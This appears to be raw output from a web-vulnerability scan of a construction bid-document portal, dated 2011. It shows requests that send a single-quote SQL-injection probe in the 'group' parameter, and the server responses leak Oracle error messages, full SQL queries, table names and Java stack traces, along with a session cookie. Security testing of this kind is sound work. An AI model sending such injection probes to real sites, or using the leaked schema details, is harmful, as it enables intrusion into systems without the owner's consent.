dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:53 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:53 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9837
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.164 [ 1] (TP-Processor1923) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Parameters
| Parameter | Type | Value |
| group | GET | %27 |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:57 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:57 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.720 [ 1] (TP-Processor1831) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:57 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:57 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:59.720 [ 1] (TP-Processor1831) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" 